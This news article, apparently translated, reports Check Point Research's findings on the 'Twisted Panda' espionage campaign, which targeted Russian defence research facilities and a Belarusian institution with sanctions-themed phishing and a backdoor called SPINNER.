Spy Campaign Twisted Panda
According to security researchers at Check Point Research (CPR), the attackers use spear phishing emails, among other social engineering techniques, under the guise of the Russian Ministry of Health, to specifically attack. The target is sensitive information from the Russian authorities. The emails intercepted by CPR also contained contaminated documents that misused Western sanctions against Russia as a decoy in their naming. The experts from Israel attribute the espionage campaign to state-supported hackers from China, because the tactics, techniques and procedures of this operation have numerous overlaps with advanced and long-standing Chinese espionage actors, including APT10 and Mustang Panda. That’s why the security experts at Check Point call this campaign Twisted Panda and emphasize that it is still running.
CPR has identified three victims, two in Russia and one in Belarus. The Russian victims belong to a parent company of the state-owned Russian armaments conglomerate Rostec Corporation, Russia’s largest holding company for the radio-electronics industry. The main activity of the Russian victims is the development and manufacture of systems for electronic warfare, military, special radio-electronic on-board equipment, airborne radar stations and means of state identification. The research facilities are also involved in avionics systems for civil aviation, the development of a variety of civil products, such as medical equipment, and control systems for the energy, transport and mechanical engineering industries.
On March 23, the phishing emails contained the subject line List of persons under US sanctions for invading Ukraine and a link to an attacker–controlled website that imitated the Russian Ministry of Health – including the official title and seal – as well as a fraudulent document as an attachment. On the same day, another e-mail was sent to an unknown institution in Belarus with the subject: US spread of deadly pathogens in Belarus. The IT campaign has numerous overlaps with advanced and long-standing Chinese hacking players, including APT10 and Mustang Panda.
For almost eleven months, the attackers were now able to evade detection, because they discovered new, unknown tools, a sophisticated multi-layer loader and a backdoor with the designation SPINNER use. First, you send a specially designed phishing e-mail to your target persons. This contains a document in which the Western sanctions against Russia are used as a decoy. When the victim opens the document, it downloads the malicious code from the attackers’ server, which installs a backdoor on the victim’s computer and secretly executes it. This backdoor collects the data about the infected computer and sends it back to the attacker. Based on this information, the attacker can use the backdoor to execute further commands on the victim’s computer or constantly collect confidential data from him.
Itay Cohen, Head of Research at Check Point Software Technologies: “We have uncovered an ongoing espionage operation against Russian military research facilities, conducted by experienced and sophisticated hackers supported by China. Our investigation shows that this is part of a larger campaign that has been going on for about a year against facilities related to Russia. We detected two targeted attacks in Russia and against a facility in Belarus. Probably the most clever part of the campaign is the social engineering component, because the coordination of the attacks and the baits used are sophisticated. From a technical point of view, the quality of the tools and their obfuscation is above average even for APT groups. I believe that our results are further proof that espionage is a systematic and long-term effort in the service of China’s strategic goals to achieve technological superiority. In this investigation, we have seen how state–backed Chinese attackers are exploiting the ongoing war between Russia and Ukraine and using advanced tools against a partner that is actually considered strategic – namely Russia.“